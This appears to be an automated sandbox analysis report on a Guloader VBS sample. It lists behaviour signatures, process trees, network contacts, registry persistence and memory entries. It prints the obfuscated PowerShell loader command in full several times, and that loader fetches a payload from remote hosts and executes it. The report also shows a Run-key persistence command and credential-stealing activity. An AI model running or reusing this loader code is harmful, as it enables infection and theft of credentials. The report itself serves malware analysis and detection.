Analysis Overview
SHA256
0b94686d3db00daa1480418c1f74d8e0917a60db9d316864043b4ed11074c8e2
Threat Level: Known bad
The file 0b94686d3db00daa1480418c1f74d8e0917a60db9d316864043b4ed11074c8e2.vbs was found to be: Known bad.
Malicious Activity Summary
Guloader,Cloudeye
Nirsoft
NirSoft WebBrowserPassView
NirSoft MailPassView
Blocklisted process makes network request
Checks computer location settings
Accesses Microsoft Outlook accounts
Adds Run key to start application
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious behavior: MapViewOfSection
Modifies registry key
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-10 14:35
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-10 14:35
Reported
2024-07-10 14:38
Platform
win7-20240704-en
Max time kernel
148s
Max time network
152s
Command Line
Signatures
Blocklisted process makes network request
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2436 wrote to memory of 2708 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2436 wrote to memory of 2708 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2436 wrote to memory of 2708 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2708 wrote to memory of 2568 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 2708 wrote to memory of 2568 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 2708 wrote to memory of 2568 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0b94686d3db00daa1480418c1f74d8e0917a60db9d316864043b4ed11074c8e2.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Tunnellen Tightropes6 Spaltegruppens Forfatningstiltag Coner Browache13 Kathode Baksning Religionists Feldbk Muselessness Caxiri Autoforhandlerens Umbral Gaeldom Lasciviently Adenodynia Pondlike Udskrivningsskemaers Lystige Styrerens Osnaburg Grihastha disputative Tunnellen Tightropes6 Spaltegruppens Forfatningstiltag Coner Browache13 Kathode Baksning Religionists Feldbk Muselessness Caxiri Autoforhandlerens Umbral Gaeldom Lasciviently Adenodynia Pondlike Udskrivningsskemaers Lystige Styrerens Osnaburg Grihastha disputative';If (${host}.CurrentCulture) {$Lejlighedsdigter++;}Function Valgsted($Reprsentationsudgift){$datasikkerheders=$Reprsentationsudgift.Length-$Lejlighedsdigter;$Achter='SUBsTR';$Achter+='ing';For( $Extratellurian=1;$Extratellurian -lt $datasikkerheders;$Extratellurian+=2){$Tunnellen+=$Reprsentationsudgift.$Achter.Invoke( $Extratellurian, $Lejlighedsdigter);}$Tunnellen;}function Differen($Dilettants){ & ($Bookmakernes) ($Dilettants);}$Bliden=Valgsted ' MSoRzmiGl.l a /T5T. 0. u(,W iMn,d.oMwFs PN T 1 0 .B0 ; W.iHnD6.4D;T WxO6N4G;R BrNvP:A1S2 1B.B0 )S GBe cMkAo./F2e0 1,0 0N1A0e1S JFPi rBeYfgoTx /H1A2S1,.,0 ';$Skridtbeskytteren=Valgsted 'PUHsHe r,- A gFeSn tT ';$Coner=Valgsted 'MhSt t.pIs,:G/D/.eSvEo l,u xIcdoFnStha,bTiBlHi dUaLd eA..cio.m .FbFr,/Fr dB/UG.rMeBeBn l,aTn,dA.SxSt p >NhAtntPp s.:r/,/ eSuPrso - f i eLrP-UvDeWc,h i . rFoL/GG,rNe,e n.lFa n dU.UxPtApA ';$Tjenstlig=Valgsted ' >M ';$Bookmakernes=Valgsted 'Bi.e xR ';$Serioese='Baksning';$Lignitize = Valgsted 'Se c h oO P% a pBpFd,a tMa.%I\UPRlSa,nAf u l n,e sPsC.DDvy,kR ,&J&. SeEc.h,o, tR ';Differen (Valgsted 'G$Sg l o,b a l :.RHeTcSa nTcJeRl e.dB=S(Sc mid R/ c. ,$,LNi.gUnMiUtHiDzVet)N ');Differen (Valgsted ' $.g.lHo bRa lC:KF,o.rEfva t.n iBnDgDsst iSlStbaSg =J$KCGoKn.e r .OsRp l,iAtI(.$ST.j eSn,sLtUl.irg.)D ');Differen (Valgsted 'K[ N,e.t,.USGe rLv iHc.eUP oMi,nStAMMaPn,angLe,r,]H:U:.S.ePcsuNrSiAtAy,PPrDoOt o cMoSl =J .[KNLe t . S.e c uTrPi t.ybPPr,o.tFoFc.oPl T y,pFe ]A: : TGlTs 1,2a ');$Coner=$Forfatningstiltag[0];$Pelt241= (Valgsted 'L$TgEl,oRbda,l :,A nFtBoAn eRl,l.e.s.=HNGe w - OMb jGeBc tP RS.y s,t e mG. N e.t.. W.eKb CmlLi e nwt');$Pelt241+=$Recanceled[1];Differen ($Pelt241);Differen (Valgsted 'A$UAUn.tVoPnre l.l,ePsB.KHAe a dIe,r s,[p$ S k.rBiSdAtMb e sQk y t tEegr,eMn ]g=b$ B lPiPd e n ');$Beskydningen=Valgsted ',$ ATn tKoKnre l lIeDsW.lDtoSwFnNl,oPa dAFTiRl.eI(S$,C oDn e.r ,f$HO.s.n a,bEuDrCg.)l ';$Osnaburg=$Recanceled[0];Differen (Valgsted ' $ gGl o bSa l :SA u t oBmRaSt kVa,fHeB=,( T e s t,-,P astFhT l$JO.s,nAaSbSuEr.gC) ');while (!$Automatkafe) {Differen (Valgsted 'A$ g l oObBa,l :TLHo b e l iAe.rDn.e = $ tFrSuDeA ') ;Differen $Beskydningen;Differen (Valgsted ',S tAaFrRt -.S.l,e,e p ,4F ');Differen (Valgsted ' $,g l oTbDa lD: ACuMtuo m a tJk a fKe = ( T eVs.tF-,P aStTh J$ O s n,a,bDusrBgA)H ') ;Differen (Valgsted 'H$BgUlHo b,aRlA:NS.pGaNl.t eFg r uGphp eNn.s,=L$.gElMo bPa.le:CT iAg hFt.rSoTp eDs 6,+I+ % $lFUo rBf.aSt n i,nEgRsPt,iEl.tGaVg . cAo uGnGt ') ;$Coner=$Forfatningstiltag[$Spaltegruppens];}$Akkomoderet=328490;$Soothest=27621;Differen (Valgsted 'C$ g lSoPbDa lB:DRPeAl,i,g.iMo,n i sCt s = DG,eFt -VC,oRn tReRn t. $ O s.nPaBb u r g ');Differen (Valgsted ' $ gCl.o bWa.l :dV e.j tor e rGnGe 1s5D8S ,= ,[,SDyAs,t,e md. CKo,n vHe rKtH] : :SF rto mHBBaQs,e 6T4FSEt r iSnKgH(G$SR e l.i,g i oMn iBsStRsO) ');Differen (Valgsted 'S$ g.lBo bra.l,: CSaAx iUr i, B=D D[ SSyBs t.e m..LT eKx t .AERnBc oSd i,n g ]D: : AMS.CBI I,.UG ePtPSEt r ijnFg ( $ V eFjVt rPe.r n,e.1I5A8C) ');Differen (Valgsted ' $Hg,l,oDbMaMlL: U.nMp r,o.v aLbSl.y =r$TCna,x.igr.iH.Ts uSbOs.tDrMi nSg,( $NAIkCkDoUmAo.dFeDrDeAtS,e$ SUo oRtShCeSs,t )T ');Differen $Unprovably;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Planfulness.Dyk && echo t"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | evoluxcontabilidade.com.br | udp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| US | 8.8.8.8:53 | euro-fier-vechi.ro | udp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| US | 192.185.217.247:443 | evoluxcontabilidade.com.br | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
| RO | 188.214.214.160:443 | euro-fier-vechi.ro | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab1E9A.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/2708-20-0x000007FEF572E000-0x000007FEF572F000-memory.dmp
memory/2708-21-0x000000001B3E0000-0x000000001B6C2000-memory.dmp
memory/2708-22-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp
memory/2708-23-0x0000000002360000-0x0000000002368000-memory.dmp
memory/2708-24-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp
memory/2708-25-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp
memory/2708-26-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp
memory/2708-27-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp
memory/2708-28-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp
memory/2708-29-0x000007FEF572E000-0x000007FEF572F000-memory.dmp
memory/2708-30-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-10 14:35
Reported
2024-07-10 14:38
Platform
win10v2004-20240709-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Guloader,Cloudeye
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\forvrrende = "%Diplococci% -w 1 $Phytosaur=(Get-ItemProperty -Path 'HKCU:\\Bortslbning\\').epidermoid;%Diplococci% ($Phytosaur)" | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 208 set thread context of 3616 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
| PID 3616 set thread context of 2980 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Program Files (x86)\windows mail\wab.exe |
| PID 3616 set thread context of 632 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Program Files (x86)\windows mail\wab.exe |
| PID 3616 set thread context of 4568 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000_Classes\Local Settings | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0b94686d3db00daa1480418c1f74d8e0917a60db9d316864043b4ed11074c8e2.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Tunnellen Tightropes6 Spaltegruppens Forfatningstiltag Coner Browache13 Kathode Baksning Religionists Feldbk Muselessness Caxiri Autoforhandlerens Umbral Gaeldom Lasciviently Adenodynia Pondlike Udskrivningsskemaers Lystige Styrerens Osnaburg Grihastha disputative Tunnellen Tightropes6 Spaltegruppens Forfatningstiltag Coner Browache13 Kathode Baksning Religionists Feldbk Muselessness Caxiri Autoforhandlerens Umbral Gaeldom Lasciviently Adenodynia Pondlike Udskrivningsskemaers Lystige Styrerens Osnaburg Grihastha disputative';If (${host}.CurrentCulture) {$Lejlighedsdigter++;}Function Valgsted($Reprsentationsudgift){$datasikkerheders=$Reprsentationsudgift.Length-$Lejlighedsdigter;$Achter='SUBsTR';$Achter+='ing';For( $Extratellurian=1;$Extratellurian -lt $datasikkerheders;$Extratellurian+=2){$Tunnellen+=$Reprsentationsudgift.$Achter.Invoke( $Extratellurian, $Lejlighedsdigter);}$Tunnellen;}function Differen($Dilettants){ & ($Bookmakernes) ($Dilettants);}$Bliden=Valgsted ' MSoRzmiGl.l a /T5T. 0. u(,W iMn,d.oMwFs PN T 1 0 .B0 ; W.iHnD6.4D;T WxO6N4G;R BrNvP:A1S2 1B.B0 )S GBe cMkAo./F2e0 1,0 0N1A0e1S JFPi rBeYfgoTx /H1A2S1,.,0 ';$Skridtbeskytteren=Valgsted 'PUHsHe r,- A gFeSn tT ';$Coner=Valgsted 'MhSt t.pIs,:G/D/.eSvEo l,u xIcdoFnStha,bTiBlHi dUaLd eA..cio.m .FbFr,/Fr dB/UG.rMeBeBn l,aTn,dA.SxSt p >NhAtntPp s.:r/,/ eSuPrso - f i eLrP-UvDeWc,h i . rFoL/GG,rNe,e n.lFa n dU.UxPtApA ';$Tjenstlig=Valgsted ' >M ';$Bookmakernes=Valgsted 'Bi.e xR ';$Serioese='Baksning';$Lignitize = Valgsted 'Se c h oO P% a pBpFd,a tMa.%I\UPRlSa,nAf u l n,e sPsC.DDvy,kR ,&J&. SeEc.h,o, tR ';Differen (Valgsted 'G$Sg l o,b a l :.RHeTcSa nTcJeRl e.dB=S(Sc mid R/ c. ,$,LNi.gUnMiUtHiDzVet)N ');Differen (Valgsted ' $.g.lHo bRa lC:KF,o.rEfva t.n iBnDgDsst iSlStbaSg =J$KCGoKn.e r .OsRp l,iAtI(.$ST.j eSn,sLtUl.irg.)D ');Differen (Valgsted 'K[ N,e.t,.USGe rLv iHc.eUP oMi,nStAMMaPn,angLe,r,]H:U:.S.ePcsuNrSiAtAy,PPrDoOt o cMoSl =J .[KNLe t . S.e c uTrPi t.ybPPr,o.tFoFc.oPl T y,pFe ]A: : TGlTs 1,2a ');$Coner=$Forfatningstiltag[0];$Pelt241= (Valgsted 'L$TgEl,oRbda,l :,A nFtBoAn eRl,l.e.s.=HNGe w - OMb jGeBc tP RS.y s,t e mG. N e.t.. W.eKb CmlLi e nwt');$Pelt241+=$Recanceled[1];Differen ($Pelt241);Differen (Valgsted 'A$UAUn.tVoPnre l.l,ePsB.KHAe a dIe,r s,[p$ S k.rBiSdAtMb e sQk y t tEegr,eMn ]g=b$ B lPiPd e n ');$Beskydningen=Valgsted ',$ ATn tKoKnre l lIeDsW.lDtoSwFnNl,oPa dAFTiRl.eI(S$,C oDn e.r ,f$HO.s.n a,bEuDrCg.)l ';$Osnaburg=$Recanceled[0];Differen (Valgsted ' $ gGl o bSa l :SA u t oBmRaSt kVa,fHeB=,( T e s t,-,P astFhT l$JO.s,nAaSbSuEr.gC) ');while (!$Automatkafe) {Differen (Valgsted 'A$ g l oObBa,l :TLHo b e l iAe.rDn.e = $ tFrSuDeA ') ;Differen $Beskydningen;Differen (Valgsted ',S tAaFrRt -.S.l,e,e p ,4F ');Differen (Valgsted ' $,g l oTbDa lD: ACuMtuo m a tJk a fKe = ( T eVs.tF-,P aStTh J$ O s n,a,bDusrBgA)H ') ;Differen (Valgsted 'H$BgUlHo b,aRlA:NS.pGaNl.t eFg r uGphp eNn.s,=L$.gElMo bPa.le:CT iAg hFt.rSoTp eDs 6,+I+ % $lFUo rBf.aSt n i,nEgRsPt,iEl.tGaVg . cAo uGnGt ') ;$Coner=$Forfatningstiltag[$Spaltegruppens];}$Akkomoderet=328490;$Soothest=27621;Differen (Valgsted 'C$ g lSoPbDa lB:DRPeAl,i,g.iMo,n i sCt s = DG,eFt -VC,oRn tReRn t. $ O s.nPaBb u r g ');Differen (Valgsted ' $ gCl.o bWa.l :dV e.j tor e rGnGe 1s5D8S ,= ,[,SDyAs,t,e md. CKo,n vHe rKtH] : :SF rto mHBBaQs,e 6T4FSEt r iSnKgH(G$SR e l.i,g i oMn iBsStRsO) ');Differen (Valgsted 'S$ g.lBo bra.l,: CSaAx iUr i, B=D D[ SSyBs t.e m..LT eKx t .AERnBc oSd i,n g ]D: : AMS.CBI I,.UG ePtPSEt r ijnFg ( $ V eFjVt rPe.r n,e.1I5A8C) ');Differen (Valgsted ' $Hg,l,oDbMaMlL: U.nMp r,o.v aLbSl.y =r$TCna,x.igr.iH.Ts uSbOs.tDrMi nSg,( $NAIkCkDoUmAo.dFeDrDeAtS,e$ SUo oRtShCeSs,t )T ');Differen $Unprovably;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Planfulness.Dyk && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Tunnellen Tightropes6 Spaltegruppens Forfatningstiltag Coner Browache13 Kathode Baksning Religionists Feldbk Muselessness Caxiri Autoforhandlerens Umbral Gaeldom Lasciviently Adenodynia Pondlike Udskrivningsskemaers Lystige Styrerens Osnaburg Grihastha disputative Tunnellen Tightropes6 Spaltegruppens Forfatningstiltag Coner Browache13 Kathode Baksning Religionists Feldbk Muselessness Caxiri Autoforhandlerens Umbral Gaeldom Lasciviently Adenodynia Pondlike Udskrivningsskemaers Lystige Styrerens Osnaburg Grihastha disputative';If (${host}.CurrentCulture) {$Lejlighedsdigter++;}Function Valgsted($Reprsentationsudgift){$datasikkerheders=$Reprsentationsudgift.Length-$Lejlighedsdigter;$Achter='SUBsTR';$Achter+='ing';For( $Extratellurian=1;$Extratellurian -lt $datasikkerheders;$Extratellurian+=2){$Tunnellen+=$Reprsentationsudgift.$Achter.Invoke( $Extratellurian, $Lejlighedsdigter);}$Tunnellen;}function Differen($Dilettants){ & ($Bookmakernes) ($Dilettants);}$Bliden=Valgsted ' MSoRzmiGl.l a /T5T. 0. u(,W iMn,d.oMwFs PN T 1 0 .B0 ; W.iHnD6.4D;T WxO6N4G;R BrNvP:A1S2 1B.B0 )S GBe cMkAo./F2e0 1,0 0N1A0e1S JFPi rBeYfgoTx /H1A2S1,.,0 ';$Skridtbeskytteren=Valgsted 'PUHsHe r,- A gFeSn tT ';$Coner=Valgsted 'MhSt t.pIs,:G/D/.eSvEo l,u xIcdoFnStha,bTiBlHi dUaLd eA..cio.m .FbFr,/Fr dB/UG.rMeBeBn l,aTn,dA.SxSt p >NhAtntPp s.:r/,/ eSuPrso - f i eLrP-UvDeWc,h i . rFoL/GG,rNe,e n.lFa n dU.UxPtApA ';$Tjenstlig=Valgsted ' >M ';$Bookmakernes=Valgsted 'Bi.e xR ';$Serioese='Baksning';$Lignitize = Valgsted 'Se c h oO P% a pBpFd,a tMa.%I\UPRlSa,nAf u l n,e sPsC.DDvy,kR ,&J&. SeEc.h,o, tR ';Differen (Valgsted 'G$Sg l o,b a l :.RHeTcSa nTcJeRl e.dB=S(Sc mid R/ c. ,$,LNi.gUnMiUtHiDzVet)N ');Differen (Valgsted ' $.g.lHo bRa lC:KF,o.rEfva t.n iBnDgDsst iSlStbaSg =J$KCGoKn.e r .OsRp l,iAtI(.$ST.j eSn,sLtUl.irg.)D ');Differen (Valgsted 'K[ N,e.t,.USGe rLv iHc.eUP oMi,nStAMMaPn,angLe,r,]H:U:.S.ePcsuNrSiAtAy,PPrDoOt o cMoSl =J .[KNLe t . S.e c uTrPi t.ybPPr,o.tFoFc.oPl T y,pFe ]A: : TGlTs 1,2a ');$Coner=$Forfatningstiltag[0];$Pelt241= (Valgsted 'L$TgEl,oRbda,l :,A nFtBoAn eRl,l.e.s.=HNGe w - OMb jGeBc tP RS.y s,t e mG. N e.t.. W.eKb CmlLi e nwt');$Pelt241+=$Recanceled[1];Differen ($Pelt241);Differen (Valgsted 'A$UAUn.tVoPnre l.l,ePsB.KHAe a dIe,r s,[p$ S k.rBiSdAtMb e sQk y t tEegr,eMn ]g=b$ B lPiPd e n ');$Beskydningen=Valgsted ',$ ATn tKoKnre l lIeDsW.lDtoSwFnNl,oPa dAFTiRl.eI(S$,C oDn e.r ,f$HO.s.n a,bEuDrCg.)l ';$Osnaburg=$Recanceled[0];Differen (Valgsted ' $ gGl o bSa l :SA u t oBmRaSt kVa,fHeB=,( T e s t,-,P astFhT l$JO.s,nAaSbSuEr.gC) ');while (!$Automatkafe) {Differen (Valgsted 'A$ g l oObBa,l :TLHo b e l iAe.rDn.e = $ tFrSuDeA ') ;Differen $Beskydningen;Differen (Valgsted ',S tAaFrRt -.S.l,e,e p ,4F ');Differen (Valgsted ' $,g l oTbDa lD: ACuMtuo m a tJk a fKe = ( T eVs.tF-,P aStTh J$ O s n,a,bDusrBgA)H ') ;Differen (Valgsted 'H$BgUlHo b,aRlA:NS.pGaNl.t eFg r uGphp eNn.s,=L$.gElMo bPa.le:CT iAg hFt.rSoTp eDs 6,+I+ % $lFUo rBf.aSt n i,nEgRsPt,iEl.tGaVg . cAo uGnGt ') ;$Coner=$Forfatningstiltag[$Spaltegruppens];}$Akkomoderet=328490;$Soothest=27621;Differen (Valgsted 'C$ g lSoPbDa lB:DRPeAl,i,g.iMo,n i sCt s = DG,eFt -VC,oRn tReRn t. $ O s.nPaBb u r g ');Differen (Valgsted ' $ gCl.o bWa.l :dV e.j tor e rGnGe 1s5D8S ,= ,[,SDyAs,t,e md. CKo,n vHe rKtH] : :SF rto mHBBaQs,e 6T4FSEt r iSnKgH(G$SR e l.i,g i oMn iBsStRsO) ');Differen (Valgsted 'S$ g.lBo bra.l,: CSaAx iUr i, B=D D[ SSyBs t.e m..LT eKx t .AERnBc oSd i,n g ]D: : AMS.CBI I,.UG ePtPSEt r ijnFg ( $ V eFjVt rPe.r n,e.1I5A8C) ');Differen (Valgsted ' $Hg,l,oDbMaMlL: U.nMp r,o.v aLbSl.y =r$TCna,x.igr.iH.Ts uSbOs.tDrMi nSg,( $NAIkCkDoUmAo.dFeDrDeAtS,e$ SUo oRtShCeSs,t )T ');Differen $Unprovably;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Planfulness.Dyk && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
